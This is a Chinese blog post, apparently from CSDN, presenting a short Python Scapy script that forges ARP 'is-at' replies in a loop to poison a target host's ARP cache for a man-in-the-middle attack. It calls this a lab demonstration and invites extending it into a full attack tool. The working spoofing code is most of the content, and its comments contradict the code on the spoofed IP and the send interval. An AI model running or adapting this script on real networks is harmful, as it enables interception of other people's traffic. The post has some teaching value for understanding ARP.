python arp脚本_Python scapy 实现一个简易 arp 攻击脚本

本文介绍了如何使用Python的Scapy库创建简单的ARP攻击脚本,以理解ARP协议的工作原理。通过示例代码展示了如何伪造ARP响应,进行中间人攻击。同时,文章提到了防止此类攻击的方法,如绑定IP和MAC地址。
摘要由CSDN通过智能技术生成

scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。

scapy的安装在Linux非常便利,但在Windows下比较复杂。

以下假定读者使用的是Ubuntu Linux 和 Python 3 环境。

scapy的安装在Linux下非常便利,在终端下执行以下命令即可完成安装:

sudo pip3 install scapy-python3

以下是一个非常简单的arp攻击演示脚本,该脚本可以在实验环境下帮助你理解arp协议的作用和原理,当然你甚至可以扩充该脚本去编写一个完整的arp攻击工具。

#!/usr/bin/python3

# -*- coding: utf-8 -*-

# ARP攻击演示脚本/arpDemo.py

from scapy.all import (

Ether,

ARP,

sendp

)

# 注意这里面的几个方法

# Ether用来构建以太网数据包

# ARP是构建ARP数据包的类

# sendp方法在第二层发送数据包

# Ether用来构建以太网数据包

eth = Ether()

arp = ARP(

# 代表ARP请求或者响应

op="is-at",

# 发送方Mac地址/毒化记录中的MAC

hwsrc="08:00:27:97:d1:f5",

# 发送方IP地址/毒化记录中的IP

psrc="192.168.31.1",

# 目标Mac地址/被欺骗主机MAC

hwdst="2C:56:DC:D3:AB:DB",

# 目标IP地址/被欺骗主机IP地址

pdst="192.168.31.248"

# 意思就是告诉192.168.31.248这个地址的主机,IP为192.168.31.100的主机MAC地址是08:00:27:97:d1:f5

# 如果不写目标主机的IP和MAC则默认以广播的形式发送

)

# scapy重载了"/"操作符,可以用来表示两个协议层的组合

# 这里我们输出一下数据包的结构信息

print((eth/arp).show())

# 发送封包,并且每间隔1秒重复发送

sendp(eth/arp, inter=2, loop=1)

攻击前我们在主机上看一下arp缓存

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值